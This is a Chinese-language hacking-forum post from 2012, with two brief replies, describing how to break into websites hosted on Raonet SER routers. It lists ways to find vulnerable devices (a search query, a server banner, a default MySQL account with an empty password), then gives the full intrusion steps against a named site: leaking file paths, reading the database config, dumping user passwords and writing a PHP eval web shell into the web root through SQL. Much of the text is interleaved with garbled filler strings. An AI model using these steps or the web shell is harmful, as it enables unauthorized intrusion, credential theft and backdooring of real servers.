找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3359|回复: 2
打印 上一主题 下一主题

利用某路由器漏洞入侵国外站点

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-10 10:30:18 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  寻找存在漏洞的路由器方法:
7 d# y8 V, m- U# r' r  T' y% G7 [
6 Q6 Q0 \0 Z7 c5 @' h* g( u/ s1:google搜索'Raonet Subscriber Ethernet Router'
2 s% v% ?/ c; I# j/ ?
/ ]! J" s" W$ I  a2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
4 a/ n  N; @' |: m4 G/ f7 Q8 B
- A! q4 b+ |& E/ h3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。
  p  G9 Q1 ]% P5 l7 |4 A
( i7 z. h5 d" O. g8 ]6 V//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
3 M0 k/ U5 Q# G6 @6 M* D! b$ Q( n" T# E# N/ L5 @: I7 d
6 z! B. W5 i8 ^/ X' p: e
  W: p5 d# K3 I0 S+ [! d! R
入侵步骤:
& g. B* w( e% ~4 a2 Q- E8 H/ Q4 L3 R  v2 |* C
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php  K# b% m! C8 ^; m0 J. [

5 W3 d/ C* w, k8 `" e2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc5 M. o) E" Z2 Q- S
3:得到密码后连接,查看GUI管理密码:
1 g$ a/ k0 e3 v, a4 |( buse ser_500
: X  j4 p$ B2 w' o/ k* _select id,passwd from user;
9 A$ `4 I  s0 c$ n- s) \1 B4:通过数据库写入webshell,执行命令:
6 Z/ T5 f. m% V* K& ^; }& E) @use mysql;, s2 C% A3 O; j! }
create table ok(cmd TEXT);
5 Z/ [0 w7 O2 m& ]2 @( q2 D2 R: iinsert into ok values("<?php @eval($_POST[cmd])?>");
/ r; E( @5 _2 r3 N1 jselect * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";- s9 F$ `9 r2 E
drop table ok;
6 _9 y% _" d( y
& ~8 Y- F$ Q+ D; ?8 g8 I( `5:连接后门shell.php
1 X# D  h/ ]! y5 c$ G; Q
# N4 N' A% f: Y/ \! Y/ n6. 搞定!
6 s- A5 R/ @. k6 A' v7 ?; g4 f# T; z4 s: f- r7 e; M. X7 z
回复

使用道具 举报

沙发
发表于 2013-7-27 20:06:50 | 只看该作者
这个后果可以很严重的说
回复 支持 反对

使用道具 举报

板凳
发表于 2013-7-29 12:07:54 | 只看该作者
不错哦,黑服务器补洞。。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表